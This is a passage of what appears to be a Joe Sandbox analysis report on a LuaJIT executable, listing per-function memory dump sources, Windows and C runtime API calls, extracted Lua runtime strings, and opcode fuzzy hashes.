                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID:
                                                      • API String ID: 3764944385-0
                                                      • Opcode ID: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                      • Instruction ID: 57cbe4376ebe9f607d6ec764c9529120a46cc2dab3ba837bf137d4dd91206bc0
                                                      • Opcode Fuzzy Hash: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                      • Instruction Fuzzy Hash: 7802C032A186458BD770DB1DE48062EB7E0F799749F904225FA9EC7B98DA7CE940CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                      • String ID:
                                                      • API String ID: 1443284424-0
                                                      • Opcode ID: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                      • Instruction ID: 40c8ecef8281d185e37b5e49901ec78e2862d035399c168c6f25b9eb2e3650a8
                                                      • Opcode Fuzzy Hash: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                      • Instruction Fuzzy Hash: 1AE1F232B1C6819AE700DB68D0801AEBBB1FB5679DB844232EF4E57B9CDE78D516C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _get_daylight.LIBCMT ref: 00007FF7B1EC2CA2
                                                        • Part of subcall function 00007FF7B1EC23E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EC23F4
                                                      • _get_daylight.LIBCMT ref: 00007FF7B1EC2CB3
                                                        • Part of subcall function 00007FF7B1EC2380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EC2394
                                                      • _get_daylight.LIBCMT ref: 00007FF7B1EC2CC4
                                                        • Part of subcall function 00007FF7B1EC23B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EC23C4
                                                        • Part of subcall function 00007FF7B1EB9294: HeapFree.KERNEL32(?,?,?,00007FF7B1EC8C78,?,?,?,00007FF7B1EC8FFB,?,?,00000019,00007FF7B1EC96D0,?,?,?,00007FF7B1EC9603), ref: 00007FF7B1EB92AA
                                                        • Part of subcall function 00007FF7B1EB9294: GetLastError.KERNEL32(?,?,?,00007FF7B1EC8C78,?,?,?,00007FF7B1EC8FFB,?,?,00000019,00007FF7B1EC96D0,?,?,?,00007FF7B1EC9603), ref: 00007FF7B1EB92BC
                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B1EC2ED0), ref: 00007FF7B1EC2CEB
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 3458911817-0
                                                      • Opcode ID: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                      • Instruction ID: 5d87874bace1c501b749dba3ec72d116ddd88d2a447910a90eaf79b9cb31c2b0
                                                      • Opcode Fuzzy Hash: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                      • Instruction Fuzzy Hash: 3E615F32A0864386E710FF2DE8815A9E760FB6A789FC45135EB4D47A99DFBCE440C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                      • String ID: ?
                                                      • API String ID: 1286766494-1684325040
                                                      • Opcode ID: 2c7f8f1d2cf675da5ae5473346d47931a08e1ba11d2448201601eda58c2183d2
                                                      • Instruction ID: cb9685a52aa00f747fa1830bfad31c32ceb1a812dab3b64dcdc7df9f726d6cc5
                                                      • Opcode Fuzzy Hash: 2c7f8f1d2cf675da5ae5473346d47931a08e1ba11d2448201601eda58c2183d2
                                                      • Instruction Fuzzy Hash: 7D91D426E0825345EB24BF2DC8402BAA751EBA2BD9F944131EF4D07ADDDEBCD442C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: InfoLocaletry_get_function
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2200034068-2904428671
                                                      • Opcode ID: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                      • Instruction ID: 742f3cebeefded1c15a187995e6def933079541bcfcd4573da6298dc4ad3b907
                                                      • Opcode Fuzzy Hash: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                      • Instruction Fuzzy Hash: AD01DB61B08B4281E700EB59B4404AAE2A0FFABBC9F9C4135EF4C1375DCE7CD5018750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9D6B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9D8A
                                                        • Part of subcall function 00007FF7B1EB9378: GetProcAddress.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB94D0
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9DA9
                                                        • Part of subcall function 00007FF7B1EB9378: LoadLibraryW.KERNELBASE(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB941B
                                                        • Part of subcall function 00007FF7B1EB9378: GetLastError.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB9429
                                                        • Part of subcall function 00007FF7B1EB9378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB946B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9DC8
                                                        • Part of subcall function 00007FF7B1EB9378: FreeLibrary.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB94A4
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9DE7
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E06
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E25
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E44
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E63
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                      • API String ID: 3255926029-3252031757
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm$_free_nolock
                                                      • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                      • API String ID: 338564694-1474762456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm
                                                      • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                      • API String ID: 1214967616-750625491
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolockwcsftime
                                                      • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                      • API String ID: 793903186-297742768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                      • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                      • API String ID: 4260375681-184456188
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: -$f$p$p
                                                      • API String ID: 3215553584-2516539321
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F481
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F48F
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F4B9
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F4FF
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7B1E8F6AE,?,?,?,00007FF7B1E8F3A0,?,?,00000001,00007FF7B1E8F135), ref: 00007FF7B1E8F50B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =[C]$Lua$main
                                                      • API String ID: 0-2004024069
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: C$I$J$N
                                                      • API String ID: 3168844106-327184588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$cosh
                                                      • API String ID: 1156100317-3800341493
                                                      • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                      • Instruction ID: c3db85587070975427265b6a2b9b8cdcd403388a968443e205ffae31eb04edd6
                                                      • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                      • Instruction Fuzzy Hash: FA81AB31928F8188D363DF3864413B6B354AF773DAF559337E64E35A59DFACA0828610
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                      • String ID: csm$csm
                                                      • API String ID: 851805269-3733052814
                                                      • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                      • Instruction ID: b23b1fe9f107cd33ea34e042c1cefeb4df3ec514132c71b16969e0d9d73f4665
                                                      • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                      • Instruction Fuzzy Hash: 9661A5329083428AEB24AF199844268B7A4EB66BDDFD84235DB4D47799DFBCF490C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
